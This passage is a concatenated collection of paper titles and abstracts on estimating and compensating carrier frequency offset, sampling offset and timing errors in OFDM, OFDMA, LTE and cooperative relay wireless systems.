Simulation results show that the method is robust under both flat-fading and multipath fading channels, and provides accurate estimation results in the presence of both large and small multiple CFO values. --- paper_title: Ultra-Wideband TOA Estimation in the Presence of Clock Frequency Offset paper_content: The paper is concerned with the impact of clock frequency offsets on the accuracy of ranging systems based on time of arrival (TOA) measurements. It is shown that large TOA errors are incurred if the transmitter and receiver clocks are mistuned by more than just one part per million (ppm). This represents a serious obstacle to the use of commercial low-cost quartz oscillators, as they exhibit frequency drifts in the range of ± 10 ppm and more. A solution is to estimate first the transmitter clock frequency relative to the receiver's and then compensate for the difference by acting on the receiver clock tuning. An algorithm is proposed that estimates the transmitter clock frequency with an accuracy better than 0.1 ppm. Computer simulations indicate that its use in ranging systems makes TOA measurements as good as those obtained with perfectly synchronous clocks. --- paper_title: Joint Maximum Likelihood Estimation of Carrier and Sampling Frequency Offsets for OFDM Systems paper_content: In orthogonal-frequency division multiplexing (OFDM) systems, carrier and sampling frequency offsets (CFO and SFO, respectively) can destroy the orthogonality of the subcarriers and degrade system performance. In the literature, Nguyen-Le, Le-Ngoc, and Ko proposed a simple maximum-likelihood (ML) scheme using two long training symbols for estimating the initial CFO and SFO of a recursive least-squares (RLS) estimation scheme. However, the results of Nguyen-Le's ML estimation show poor performance relative to the Cramer-Rao bound (CRB). In this paper, we extend Moose's CFO estimation algorithm to joint ML estimation of CFO and SFO using two long training symbols. In particular, we derive CRBs for the mean square errors (MSEs) of CFO and SFO estimation. Simulation results show that the proposed ML scheme provides better performance than Nguyen-Le's ML scheme. --- paper_title: Coordinated Multi-Cell Systems: Carrier Frequency Offset Estimation and Correction paper_content: We consider a coordinated multi-cell (CMC) system and the associated problem of independent carrier frequency offsets (CFOs) at the basestations (BSs). These BS CFOs cause accumulated phase errors that compromise downlink beamforming accuracy, and consequently degrade the spectral efficiency of the CMC system. Since the inherent structure of coordinated downlink beamforming techniques makes it impossible to correct for the BS CFOs at the mobile subscriber (MS), our topic is estimation and correction of the BS CFOs at the BSs. Our method begins with the formation of MS-side estimates of the BS CFOs, which are then fed back to the coordinated BSs. We then derive an optimum maximum likelihood (ML) estimator for the BS CFOs that uses independent MS-side CFO estimates and average channel signal-to-noise ratios. However, it is demonstrated that the CFOs of the MSs themselves introduce a bias to the optimal BS CFO estimator. To compensate for this bias, a joint BS and MS CFO estimator is derived, but shown both to require high computation and have rank deficiency. This motivates an improved technique that removes the rank problem and employs successive estimation to reduce computation. It is demonstrated to overcome the MS CFO bias and efficiently solve the joint BS and MS CFO problem in systems that have low to moderate shadowing. We term the full BS CFO estimation and correction procedure "BS CFO tightening". --- paper_title: Total Inter-Carrier Interference Cancellation for MC-CDMA System in Mobile Environment paper_content: Multi-carrier code division multiple access (MC-CDMA)has been considered as a strong candidate for next generation wireless communication system due to its excellent performance in multi-path fading channel and simple receiver structure. However, like all the multi-carrier transmission technologies such as OFDM, the inter-carrier interference (ICI) produced by the frequency offset between the transmitter and receiver local oscillators or by Doppler shift due to high mobility causes significant BER (bit error rate) performance degradation in MC-CDMA system. Many ICI cancellation methods such as windowing and frequency domain coding have been proposed in the literature to cancel ICI and improve the BER performance for multi-carrier transmission technologies. However, existing ICI cancellation methods do not cancel ICI entirely and the BER performance after ICI cancellation is still much worse than the BER performance of original system without ICI. Moreover, popular ICI cancellation methods like ICI self-cancellation reduce ICI at the price of lowering the transmission rate and reducing the bandwidth efficiency. Other frequency-domain coding methods do not reduce the data rate, but produce less reduction in ICI as well. In this paper, we propose a novel ICI cancellation scheme that can eliminate the ICI entirely and offer a MC-CDMA mobile system with the same BER performance of a MC-CDMA system without ICI. More importantly, the proposed ICI cancellation scheme (namely Total ICI Cancellation) does not lower the transmission rate or reduce the bandwidth efficiency. Specifically, by exploiting frequency offset quantization, the proposed scheme takes advantage of the orthogonality of the ICI matrix and offers perfect ICI cancellation and significant BER improvement at linearly growing cost. Simulation results in AWGN channel and multi-path fading channel confirm the excellent performance of the proposed Total ICI Cancellation scheme in the presence of frequency offset or time variations in the channel, outperforming existing ICI cancellation methods. --- paper_title: Wide-range frequency offset estimation method for a DD-OFDM-PON downstream system paper_content: We propose a wide-range frequency offset estimation algorithm used in a direct detection orthogonal frequency division multiplexing passive optical network (DD-OFDM-PON) downstream system. Using this method, frequency offset is estimated according to the spectrum of the received DD-OFDM signal. The estimated frequency offset is used for frequency down-conversion in the digital domain to obtain the baseband OFDM signal. With this method, all data-bearing subcarriers should fall into the OFDM bandwidth after frequency down-conversion. The validity of the method is confirmed by an experiment with 20 Gb/s OFDM-PON downstream transmission. --- paper_title: Coarse frame synchronization for OFDM systems using SNR estimation paper_content: In wireless orthogonal frequency division multiplexing (OFDM) systems, coarse frame synchronization and signal-to-noise ratio (SNR) values are two crucial parameters for OFDM receivers. In this paper, we develop a coarse timing estimator to overcome the plateau phenomenon by using delayed correlation between two estimated SNR values. The training symbol is designed for multiple pieces instead of two parts to mitigate the Doppler effect for SNR estimation. Compared with the Minn's scheme, our proposed scheme has smaller estimation variance both in EVA and ETU channels, which can also provide an estimated SNR value in the time domain. The obtained SNR value can be further reused to carrier frequency offset (CFO) estimation or decoding for system performance improvement. --- paper_title: High resolution range profile analysis based on multicarrier phase-coded waveforms of OFDM radar paper_content: Orthogonal frequency division multiplexing (OFDM) radar with multicarrier phase-coded waveforms has been recently introduced to achieve high range resolution. The conventional method for obtaining the high resolution range profile (HRRP) is based on matched filters. A method of synthesizing HRRP based on the fast Fourier transform (FFT) and decoding is proposed. The mathematical expressions of HRRP are derived by assuming an elementary scenario of point-scattering targets. Based on the characteristic of OFDM multicarrier signals, it mainly analyzes the influence on HRRP exerted by several factors, such as velocity compensation errors, the sampling frequency offset, and so on. The conclusions are significant for the design of the OFDM imaging radar. Finally, the simulation results demonstrate the validity of the conclusions. --- paper_title: Robust Timing Estimation Method for OFDM Systems With Reduced Complexity paper_content: As a modification of Hamed and Mahrokh's (HM) method, a preamble based timing offset estimation method for orthogonal frequency division multiplexing (OFDM) systems is presented. To make the estimator simpler in computation and keep its immunity to carrier frequency offset (CFO), the local autocorrelation sequence of the known preamble is mapped into an elaborately simplified one. The performance of the proposed estimator is evaluated by mean square error (MSE). Computer simulations under three different Rayleigh fading channels show that the proposed method achieves the same performance as HM's method with only half of its computational complexity. --- paper_title: Time and frequency synchronisation scheme for orthogonal frequency division multiplexing-based cooperative systems paper_content: In the cooperative relay system, different frames from different relays are not aligned in the time domain, and have different carrier frequency offsets (CFOs). Estimation of these timing offsets and CFOs is a crucial and challenging task. In this study, a new training structure is proposed, and a novel time and frequency synchronisation scheme is presented for orthogonal frequency division multiplexing-based (OFDM-based) cooperative systems. The coarse time synchronisation is accomplished by using the symmetric conjugate of the training symbol and the fine time synchronisation is accomplished by segment-moving correlation. The fractional frequency offset is estimated by using the phase difference of the received signal and the integral frequency offset is estimated by utilising the good autocorrelation of the training symbol in frequency domain. The analysis and the simulation results show that, compared with the traditional scheme, the proposed scheme has better timing and frequency offset estimation performance and lower complexity for OFDM-based cooperative systems. --- paper_title: Improved least squares channel estimation for orthogonal frequency division multiplexing paper_content: The authors consider the design of pilot sequences for channel estimation in the presence of carrier frequency offset (CFO) in systems that employ orthogonal frequency division multiplexing (OFDM). The CFO introduces intercarrier interference (ICI) which degrades the accuracy of the channel estimation. In order to minimise this effect, the authors design pilot sequence that minimises the mean square error (MSE) of the modified least squares (mLS) channel estimator. Since the identical pilot sequence, which minimises this MSE, has high peak-to-average power ratio of the OFDM signal, an alternative approach is proposed for channel estimation. The authors first introduce a new estimator as an alternative to the mLS estimator and design a low PAPR pilot sequences tailored to this new estimator. They show that the proposed procedure completely eliminates the effect of the ICI on the channel estimate. They then extend their design of pilot sequences for realistic sparse channels. Both analytical and computer simulation results presented in this study demonstrate the superiority of the proposed approach over conventional methods for channel estimation in the presence of ICI. --- paper_title: Trade off between Frequency Diversity and Robustness to Carrier Frequency Offset in Uplink OFDMA System paper_content: In this paper, we investigate the effect of subcarrier allocation on the CFO for uplink OFDMA systems. Carriers are allocated to the users in order to get maximum throughput by making use of the channel frequency diversity. But in systems with CFO, while allocating the carriers to the users, attention must be paid to the ICI resulting due to CFO. In this paper we propose a carrier allocation scheme that provides a good compromise between the throughput maximization and robustness to the CFO induced ICI for systems with and without channel state information (CSI). --- paper_title: Frequency Offset Estimation in 3G LTE paper_content: 3G Long Term Evolution (LTE) technology aims at addressing the increasing demand for mobile multimedia services in high user density areas while maintaining good performance in extreme channel conditions such as high mobility of High Speed Trains. This paper focuses on the latter aspect and compares different algorithms for the uplink frequency offset estimation in LTE Base Stations (eNodeB). A frequency-domain maximum-likelihood based solution is proposed, taking profit of the available interference-free OFDM symbols de-mapped (or de-multiplexed) at the output of the FFT of an OFDMA multi-user receiver. It is shown to outperform the state-of-the-art CP correlation approach on both link-level performance and complexity aspects. --- paper_title: CFO Estimation and Compensation in SC-IFDMA Systems paper_content: Single carrier interleaved frequency division multiple access (SC-IFDMA) has been recently receiving much attention for uplink multiuser access in the next generation mobile systems because of its lower peak-to-average transmit power ratio (PAPR). In this paper, we investigate the effect of carrier frequency offset (CFO) on SC-IFDMA and propose a new low-complexity time domain linear CFO compensation (TD-LCC) scheme. The TD-LCC scheme can be combined with successive interference cancellation (SIC) to further improve the system performance. The combined method will be referred to as TD-CC-SIC. We shall study the use of user equipment (UE) ordering algorithms in our TD-CC-SIC scheme and propose both optimal and suboptimal ordering algorithms in the MMSE sense. We also analyze both the output SINR and the BER performance of the proposed TD-LCC and TD-CC-SIC schemes. Simulation results along with theoretical SINR and BER results will show that the proposed TD-LCC and TD-CC-SIC schemes greatly reduce the CFO effect on SC-IFDMA. We also propose a new blind CFO estimation scheme for SC-IFDMA systems when the numbers of subcarrier sets allocated to different UEs are not the same due to their traffic requirements. Compared to the conventional blind CFO estimation schemes, it is shown that by using a virtual UE concept, the proposed scheme does not have the CFO ambiguity problem, and in some cases can improve the throughput efficiency since it does not need to increase the length of cyclic prefix (CP). --- paper_title: Particle Filters for Joint Timing and Carrier Estimation: Improved Resampling Guidelines and Weighted Bayesian Cramer-Rao Bounds paper_content: This paper proposes a framework for joint blind timing and carrier offset estimation and data detection using a Sequential Importance Sampling (SIS) particle filter in Additive White Gaussian Noise (AWGN) channels. We assume baud rate sampling and model the intractable posterior probability distribution functions for sampling timing and carrier offset particles using beta distributions. To enable the SIS approach to estimate static synchronization parameters, we propose new resampling guidelines for dealing with the degeneracy problem and fine tuning the estimated values. We derive the Weighted Bayesian Cramer Rao Bound (WBCRB) for joint timing and carrier offset estimation, which takes into account the prior distribution of the estimation parameters and is an accurate lower bound for all considered Signal to Noise Ratio (SNR) values. Simulation results are presented to corroborate that the Mean Square Error (MSE) performance of the proposed algorithm is close to optimal at higher SNR values (above 20 dB). In addition, the bit error rate performance approaches that of the perfectly synchronized case for small unknown carrier offsets and any unknown timing offset. The advantage of our particle filter algorithm, compared to existing techniques, is that it can work for the full range acquisition of carrier offsets. --- paper_title: Analysis of the Frequency Offset Effect on Random Access Signals paper_content: Zadoff-Chu (ZC) sequences have been used as random access sequences in modern wireless communication systems, replacing the conventional pseudo-random-noise (PN) sequences due to their superior autocorrelation properties. An analytical framework quantifying the ZC sequence's performance and its fundamental limitation as a random access sequencein the presence of frequency offset between the transmitter and the receiver is introduced. We show that a ZC sequence's perfect autocorrelation properties can be severely impaired by the frequency offset thereby limiting the overall performance of the random access signals formed from these sequences. First, we derive the autocorrelation function of these random access sequences as a function of the frequency offset. Next, we introduce the concept of critical frequency offsets and the spectrum associated with a ZC sequence set to characterize the frequency offset properties of the random access signals. Finally, we demonstrate that the frequency offset immunity of a ZC sequence set can be controlled by shaping the spectrum of the ZC sequence set. --- paper_title: Practical analysis of codebook design and frequency offset estimation for virtual-multiple-input-multipleoutput systems paper_content: A virtual-multiple-input-multiple-output (MIMO) wireless system using the receiver-side cooperation with the compress-and-forward (CF) protocol, is an alternative to a point-to-point MIMO system, when a single receiver is not equipped with multiple antennas. It is evident that the practicality of CF cooperation will be greatly enhanced if an efficient source coding technique can be used at the relay. It is even more desirable that CF cooperation should not be unduly sensitive to carrier frequency offsets (CFOs). This study presents a practical study of these two issues. Firstly, codebook designs of the Voronoi vector quantisation (VQ) and the tree-structure VQ (TSVQ) to enable CF cooperation at the relay are described. A comparison in terms of the codebook design and encoding complexity is analysed. It is shown that the TSVQ is much simpler to design and operate, and can achieve a favourable performance-complexity tradeoff. Furthermore, this study demonstrates that CFO can lead to significant performance degradation for the virtual-MIMO system. To overcome this, it is proposed to maintain clock synchronisation and jointly estimate the CFO between the relay and the destination. This approach is shown to provide a significant performance improvement. --- paper_title: DSTBC based DF cooperative networks in the presence of timing and frequency offsets paper_content: In decode-and-forward (DF) relaying networks, the received signal at the destination may be affected by multiple impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). This paper proposes novel optimal and sub-optimal minimum mean-square error (MMSE) receiver designs at the destination node to detect the signal in the presence of these impairments. Distributed space-time block codes (DSTBCs) are used at the relays to achieve spatial diversity. The proposed sub-optimal receiver uses the estimated values of multiple channel gains, MTOs, and MCFOs, while the optimal receiver assumes perfect knowledge of these impairments at the destination and serves as a benchmark performance measure. To achieve robustness to estimation errors, the estimates statistical properties are exploited at the destination. Simulation results show that the proposed optimal and sub-optimal MMSE compensation receivers achieve full diversity gain in the presence of channel and synchronization impairments in DSTBC based DF cooperative networks. --- paper_title: Comments on "Timing Estimation and Resynchronization for Amplify-and-Forward Communication Systems" paper_content: This comment first shows that the Cramer-Rao lower bound (CRLB) derivations in the above paper are not exact. In addition, contrary to the claims in the above paper, the assumptions of perfect timing offset estimation and matched-filtering at the relays affect the generality of the analytical results and cannot be justified. --- paper_title: Three-Stage Treatment of TX/RX IQ Imbalance and Channel with CFO for SC-FDE Systems paper_content: Direct-conversion transceiver obtains increasing attentions due to its low power consumption, but it confronts with serious IQ imbalance. In this paper, a three-stage treatment of transmitter/receiver (TX/RX) IQ imbalance and channel, in the presence of carrier frequency offset (CFO), is proposed for single-carrier-frequency-domain-equalization (SC-FDE) systems. First, RX IQ imbalance and CFO are handled with a repetitive preamble. Second, joint responses of TX IQ imbalance and channel are estimated by designing another preamble via complementary Golay codes. Third, joint compensation of TX IQ imbalance and time-varying channel is conducted using the minimal-mean-square-error criterion. Simulations are presented to verify the proposed method, in terms of normalized mean square error for the estimation and bit error rate for the overall system. --- paper_title: Receiver Design for Single-Frequency Networks with Fast-Varying Channels paper_content: SC-FDE (Single Carrier Frequency-Domain Equalization) modulations are known to be suitable for broadband wireless communications due to their robustness against severe time-dispersion effects and the relatively low envelope fluctuations of the transmitted signals. In this paper we consider the use of SC-FDE schemes in broadcast and multicast systems with SFN (Single Frequency Network) operation where we do not have perfect carrier synchronization between different transmitters. We study the impact of different CFO (Carrier Frequency Offset) between the local oscillator at the receiver and the local oscillator at each transmitter. We also propose receiver structures able to reduce the performance degradation caused by different CFO at different transmitters. Our receivers can be regarded as modified turbo equalizer implemented in the frequency-domain, where a frequency offset compensation is performed before the iterative receiver. --- paper_title: Two-Dimensional ESPRIT-Like Shift-Invariant TOA Estimation Algorithm Using Multi-Band Chirp Signals Robust to Carrier Frequency Offset paper_content: In this paper, a two-dimensional (2-D) ESPRIT-like shift-invariant time-of-arrival (TOA) estimation (ELSITE) algorithm for multi-band chirp signals in the presence of a carrier frequency offset (CFO) is presented. For the shift invariant TOA estimation, the received signals must be transformed into a sinusoidal form. When the received signals are perturbed by a CFO, the frequency of the transformed sinusoids is also shifted such that the TOA estimation results are biased. The TOA-induced phase shift of the multi-band chirp signals is determined according to the parameters of the signal, while the CFO-induced phase shift is only proportional to the elapsed time. Based on this property, the proposed ELSITE algorithm achieves robust TOA estimation against CFO from the signal subspace of the stacked matrix. The root mean square error of the proposed algorithm was analyzed and verified in both an AWGN channel and a multipath channel with CFO via Monte-Carlo simulations. --- paper_title: ML Detection with Successive Group Interference Cancellation for Interleaved OFDMA Uplink paper_content: To mitigate the interference caused by multiple carrier frequency offsets (CFO) of distributed users, a maximum likelihood (ML) detection with group-wise successive interference cancellation (GSIC) is proposed for interleaved Orthogonal Frequency Division Multiplexing Access (OFDMA) uplink. By exploiting the interference characteristics and the finite alphabet property of transmitted symbols, the proposed scheme first extracts the block diagonal of the frequency domain channel matrix and then employs ML detection via sphere decoding in each block. The decisions obtained from the detected blocks are used to mitigate the interference to the residual blocks. Numerical results show that the proposed scheme outperforms both the minimum mean square error (MMSE) detection and parallel interference cancellation (PIC) with affordable computational complexity. --- paper_title: Gain-Control-Free Blind Carrier Frequency Offset Acquisition for QAM Constellations paper_content: This paper introduces a novel blind frequency offset estimator for quadrature amplitude modulated (QAM) signals. Specifically, after a preliminary frequency compensation, the estimator is based on the ?/2-folded phase histogram of the received data. Then, the frequency offset estimate is taken as the frequency compensation value that minimizes the mean square error between the phase histogram measured on the received samples and the reference phase probability density function analytically calculated in the case of zero frequency offset. The ?/2 -folded phase histogram of the received data is here called Constellation Phase Signature, since it definitively characterizes the phase distribution of signal samples belonging to a particular QAM constellation, and it has already been employed to develop a gain-control-free phase estimator that well performs both for square and cross constellations. Also the here described frequency offset estimator has the remarkable property to be gain-control-free and, thus, it can be fruitfully employed in frequency acquisition stages. The asymptotic performance of the estimator has been analytically evaluated and assessed by numerical simulations. Theoretical analysis and numerical results show that the novel frequency offset estimator outperforms state-of-the art estimators in a wide range of signal-to-noise ratio (SNR) values. --- paper_title: An efficient reduced-complexity two-stage differential sliding correlation approach for OFDM synchronization in the multipath channel paper_content: In this paper we propose a reduced-complexity two-stage time and frequency synchronization approach for OFDM systems, operating in multipath channels. The proposed approach exploits a single-symbol preamble with a repetitive structure, composed of two identical m-sequences. The first coarse stage, based on a sliding correlation, finds out the reduced uncertainty interval over which the second fine stage, based on a differential correlation, is performed. The combined use of the sliding correlation, characterized by its low complexity, and the differential correlation, which is much more complex, carried for a limited number of times results in an overall reduced complexity approach. For the time synchronization, the performance is evaluated in terms of correct detection rate of the frame start and the estimation variance. For the frequency synchronization, we focus on the fractional part of the frequency offset which is evaluated in terms of mean squared error. The simulation results prove that, compared to the considered benchmarks, the accuracy of the frame start detection and the fractional frequency offset estimation are greatly enhanced, even at very low SNRs. The proposed two-stage reduced-complexity approach is also compared to the single-stage brute-force approach, where differential correlation is exclusively used, to assess the performance degradation occasioned by the complexity reduction. --- paper_title: Optimal Training Sequences for Joint Timing Synchronization and Channel Estimation in Distributed Communication Networks paper_content: For distributed multi-user and multi-relay cooperative networks, the received signal may be affected by multiple timing offsets (MTOs) and multiple channels that need to be jointly estimated for successful decoding at the receiver. This paper addresses the design of optimal training sequences for efficient estimation of MTOs and multiple channel parameters. A new hybrid Cramer-Rao lower bound (HCRB) for joint estimation of MTOs and channels is derived. Subsequently, by minimizing the derived HCRB as a function of training sequences, three training sequence design guidelines are derived and according to these guidelines, two training sequences are proposed. In order to show that the proposed design guidelines also improve estimation accuracy, the conditional Cramer-Rao lower bound (ECRB), which is a tighter lower bound on the estimation accuracy compared to the HCRB, is also derived. Numerical results show that the proposed training sequence design guidelines not only lower the HCRB, but they also lower the ECRB and the mean-square error of the proposed maximum a posteriori estimator. Moreover, extensive simulations demonstrate that application of the proposed training sequences significantly lowers the bit-error rate performance of multi-relay cooperative networks when compared to training sequences that violate these design guidelines. --- paper_title: Cooperative Space-Time Coded OFDM with Timing Errors and Carrier Frequency Offsets paper_content: The use of distributed space-time codes in cooperative communications promises to increase the rate and reliability of data transmission. These gains were mostly demonstrated for ideal scenarios, where all nodes are perfectly synchronized. Considering a cooperative uplink scenario with asynchronous nodes, the system suffers from two effects: timing errors and individual carrier frequency offsets. In effect, timing errors can completely cancel the advantages introduced by space-time codes, while individual carrier frequency offsets provide a great challenge to receivers. Indeed, frequency offsets are perceived as a time-variant channel (even if the individual links are static) in distributed cooperative communications. We show that using OFDM, space-time codes (STCs) become tolerant to timing errors. Channel estimation and tracking takes care of frequency offsets. Our simulations demonstrate that the bit error rate performance improves by an order of magnitude, when using a cooperative system design, which takes these two effects into account. --- paper_title: Compensation of multiple carrier frequency offsets in amplify-and-forward cooperative networks paper_content: In this paper, we propose a method to find an optimal correction value for multiple carrier frequency offsets (CFO) compensation, where two received signals have different path gains, in orthogonal frequency division multiplexing (OFDM) systems. Multiple CFOs are occurred when two spatially-separated transmitters are used to transmit the same signal simultaneously. In this case, the sidelobes of the subcarrier spectrums of the undesired signals have similar magnitude with opposite signs. Based on this fact, we propose a self-cancellation method of intercarrier interference caused by multiple CFOs. In the proposed scheme, we compensate the multiple CFOs for the signal to intercarrier interference power ratio of the received signal to be maximized, instead only the signal power is maximized in the ordinary methods. --- paper_title: Improved Code-Aided Symbol Timing Recovery with Large Estimation Range for LDPC-Coded Systems paper_content: We present an improved code-aided symbol timing recovery method for low-density parity-check (LDPC) coded systems, which comprises two supporting algorithms: 1) a coarse estimation by utilizing a cost function, the mean absolute value of soft output of the LDPC decoder and 2) a fine estimation based on the Expectation-Maximization (EM) algorithm with a simple maximization step. With low computational complexity, this proposed algorithm can achieve symbol timing recovery at low signal-to-noise ratio (SNR) with large estimation range, eliminating the biased results of many algorithms for large timing offset values. Simulation results for the case of 8-PSK system with (1944,972) LDPC code show that the root-mean-square-error (RMSE) performance of the proposed algorithm approaches the modified Cramer-Rao lower bound (MCRB) at Eb/No=4dB, and the bit-error-rate (BER) curve is very close to that of ideal synchronization. --- paper_title: Exact Signal Model and New Carrier Frequency Offset Compensation Scheme for OFDM paper_content: Carrier frequency offset (CFO) causes spectrum misalignment of transmitter and receiver filters. This misalignment leads to energy loss and distortion of received signal, resulting in performance degradation of the whole system. However, these issues are often overlooked by existing works. This paper presents an exact signal model for OFDM that takes into account the CFO-induced spectral misalignment and related aliasing effects. Incorporating these practical issues, we also propose a new preamble structure and a new CFO compensation approach to mitigate their negative effects. Theoretical analysis and simulation results substantiate the importance of the exact signal model and the advantage of the proposed CFO compensation scheme. --- paper_title: Optimum Pilot Sequences for Data-Aided Synchronization paper_content: We compute the pilot sequences that minimize the Cramer-Rao bound(CRB) for carrier phase offset, carrier frequency offset, and symbol timing offset estimation. If we require the pilot sequence to be drawn from a discrete set of constellation points, then the alternating sequence is the CRB-minimizing sequence. If we relax the constellation constraint and apply a total energy constraint, we obtain three different sequences that minimize the CRB for each of the synchronization parameters. We show that the maximum-likelihood (ML) estimator achieves the CRB for any of the sequences presented. We also explore the impact of using the pilot symbols in a preamble with unknown data symbols immediately following. The interference caused by the unknown data symbols reduces the performance of the ML estimator beyond an SNR threshold. --- paper_title: Low-Complexity Semiblind Multi-CFO Estimation and ICA-Based Equalization for CoMP OFDM Systems paper_content: We propose a low-complexity semiblind structure with multiple-carrier-frequency-offset (CFO) estimation and independent component analysis (ICA)-based equalization for multiuser coordinated multipoint (CoMP) orthogonal frequency-division-multiplexing (OFDM) systems. A short pilot is carefully designed for each user and has a twofold advantage. On the one hand, using the pilot structure, a complex multidimensional search for multiple CFOs is divided into a number of low-complexity monodimensional searches. On the other hand, the cross correlations between the transmitted and the received pilots are explored to allow simultaneous elimination of permutation ambiguity and quadrant ambiguity in the ICA equalized signals. Simulation results show that with a low training overhead of 1.6%, the proposed semiblind system not only outperforms the existing multi-CFO estimation schemes in terms of bit error rate (BER) and mean square error (MSE) of multi-CFO estimation but achieves a BER performance close to the ideal case with perfect channel state information (CSI) and no CFO at the receiver as well. --- paper_title: Low-complexity frequency offset and phase noise estimation for burst-mode digital transmission paper_content: The presence of a frequency offset (FO) and phase noise can cause severe performance degradation in digital communication systems. This work combines a simple FO estimation technique with a low-complexity phase noise estimation method, inspired by the space-alternating generalized expectation-maximization algorithm. Using a truncated discrete-cosine transform (DCT) expansion, the phase noise estimate is derived from the estimated DCT coefficients of the phase. A number of implementations of the proposed algorithm are discussed. Numerical results indicate that when estimating the FO from pilot symbols only, comparable performance can be reached as the computationally more complex case where the FO is updated iteratively, with small convergence time. The phase noise estimation step is well capable of compensating for the residual FO. For the considered scenario, performing FO compensation before iterative phase noise estimation yields a bit-error rate performance degradation close to the case where the FO is known. --- paper_title: Multiple carrier frequency offsets tracking in co-operative space-frequency block-coded orthogonal frequency division multiplexing systems paper_content: This study addresses the problem of carrier frequency offset (CFO) tracking in co-operative space-frequency block-coded orthogonal frequency division multiplexing (OFDM) systems with multiple CFOs. Considering that the inserted pilot tones are decayed by data subcarriers in the presence of multiple CFOs, a novel recursive residual CFO tracking (R-RCFOTr) algorithm is proposed. This method first removes CFO-induced inter-carrier interference from data subcarriers, and then updates the residual CFO (RCFO) estimation of each OFDM block recursively. When used in conjunction with a multiple CFOs estimator, the proposed R-RCFOTr can effectively mitigate the impacts from the multiple RCFOs with affordable complexity. Finally, simulation results are provided to validate the effectiveness of our proposed R-RCFOTr algorithm, which has performance close to that of perfect CFO estimation at moderate and high signal-to-noise ratio, and significantly outperforms conventional CFO tracking algorithm for large CFOs. --- paper_title: Accurate Pilot-Aided Sampling Frequency Offset Estimation Scheme for DRM Broadcasting Systems paper_content: In this paper, we propose an improved sampling frequency offset (SFO) estimation scheme for orthogonal frequency division multiplexing (OFDM) based digital radio mondiale (DRM) broadcasting systems. To demonstrate the performance of the proposed frequency estimator, analytical expression of the mean square error (MSE) is derived and performances are compared with conventional pilot-assisted estimators. Based on the simulation and theoretical analysis, our proposed estimator shows an improved estimation performance compared to the conventional estimators. --- paper_title: Sequential Compensation of RF Impairments in OFDM Systems paper_content: Direct-conversion OFDM transceivers are seriously affected by front-end distortions like IQ imbalance and phase noise. Moreover, OFDM systems are sensitive to nonlinear distortions in power amplifiers and A/D converters, and to carrier frequency offset (CFO). We present a novel baseband compensation technique that compensates these main impairments in OFDM systems. Unlike compensation scheme that target a subset of impairments, our method jointly mitigates the effects of IQ imbalance, phase noise, carrier frequency offset and nonlinear distortion. Simulations of the proposed scheme with large levels of CFO, IQ imbalance and phase noise show an excellent performance in terms of bit error rate. --- paper_title: Suppression of ICI and MAI in SC-FDMA communication system with carrier frequency offsets paper_content: Similar to other orthogonal frequency division multiplexing (OFDM)-based systems, carrier frequency offset (CFO) is a challenging problem in uplink communications of single carrier frequency division multiple access (SC-FDMA) system. It must be noticed that CFO, which is mainly due to oscillator instability and/or Doppler shift, would generate inter carrier interference (ICI) as well as multi-access interference (MAI) to disturb the received signals and seriously degrade system performance. Frequency synchronization in uplink communications is difficult because different users always experience different CFOs and one user's CFO correction would misalign other users. In this paper, we proposed a suppression method to overcome the multi CFOs problem. To implement this algorithm, block type pilots would be exploited, which is also utilized in LTE uplink standard. The proposed algorithm is based on the following two assumptions. Firstly the proposed algorithm is applied in this scenario, where different users start to communicate with the base station at different symbol periods, and secondly, during the pilot block and the following data blocks, the CFO of each user is quasi static, which is feasible since CFO is slow varying. Compared with other interference suppression methods, the proposed method could directly estimate the interference components from the inverse pilot matrix, thus it does not need to do the CFO estimation. Further more, since block type pilots is a common pilot pattern in wireless communication system, this algorithm can be easily extended to other communication system. Simulation results show that the proposed suppression algorithm can significantly improved system performance. --- paper_title: A Novel Initial Cell Search Scheme in TD-LTE paper_content: In LTE system, in order to access the network, user equipment (UE) should detect the primary synchronization signal (PSS) and secondary synchronization signal (SSS) in downlink (DL) signal from the surrounding base stations (BS). This paper presents a novel initial cell search (ICS) scheme in TD-LTE system that contains two steps. In the first step, modified normalization based PSS detection is proposed to combat carrier frequency offset (CFO) and uplink (UL) interference. After CFO estimation and compensation, coherent SSS detection is adopted in frequency domain in the second period. Furthermore, in order to combat channel fading and noise, a method of flexible combination of PSS and SSS within several frames is proposed. Simulation results demonstrate that the proposed scheme is more robust and effective than conventional approaches in TDD system. --- paper_title: Time and frequency offset estimation for distributed multiple-input multiple-output orthogonal frequency division multiplexing systems paper_content: This study addresses the problem of time and frequency offset estimation in the case of the delays, and the frequency offsets of all the transmitter/receiver pairs are different for distributed multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) systems. A new training structure is designed and an efficient time and frequency offset estimator is proposed. With the symmetric conjugate property of the preamble, the timing metric proposed has an impulse shape, making the time offset estimation accurate. Using the repetition property of the preamble, iterative frequency offset estimation algorithm proposed can acquire a high precision and a wide estimation range. To distinguish different transmit antennas, the preamble is weighted by pseudo-noise (PN) sequences with low cross-correlations. The analysis and the simulation results show that the proposed estimator offers an accurate estimation on the different time delays and frequency offsets caused by the distributed transmitters of the MIMO-OFDM system. This is a situation that the conventional estimators cannot handle as far. --- paper_title: Frequency Synchronization for the OFDMA Uplink Based on the Tile Structure of IEEE 802.16e paper_content: The multiple carrier frequency offsets (CFOs) of multiple users make frequency synchronization a challenging task in the orthogonal frequency-division multiple-access (OFDMA) uplink. In this paper, a computationally efficient iterative CFO estimation and compensation method for the OFDMA uplink with the generalized subcarrier allocation scheme (CAS) based on the tile structure of IEEE 802.16e is proposed. The proposed method only needs a few iteration cycles for its convergence. It greatly lowers the computational cost for the existing methods and can achieve better CFO estimation and compensation performance. --- paper_title: Multiple Carrier Frequency Offset and Channel Estimation for Distributed Relay Networks paper_content: Cooperative communication using decode and forward (DF)-based distributed relays is one important solution to achieve better connectivity and higher data rates in wireless fading channels. In distributed relay networks, each relay has an independent local oscillator which when unsynchronized results in the presence of multiple carrier frequency offsets (CFOs) at the destination. The maximum likelihood estimator (MLE) for estimating the multiple CFOs requires a two dimensional grid search involving matrix inversion for each search point. Thus, the multiple CFO and channel estimation is computationally prohibitive and challenging in distributed relay networks. In this paper, we propose a simple estimator for multiple CFO and channel estimation at the destination by exploiting the fact that the relays receive information from a common source. Computer simulations show that the mean square error (MSE) performance of the proposed estimator is close to the Cramer-Rao lower bound for small carrier frequency synchronization errors at the relays. --- paper_title: Frequency Offset Estimation in I/Q Mismatched OFDM Receivers paper_content: The direct-conversion architecture is a promising solution for the design of low-cost mobile terminals. However, it introduces extra RF impairments that greatly 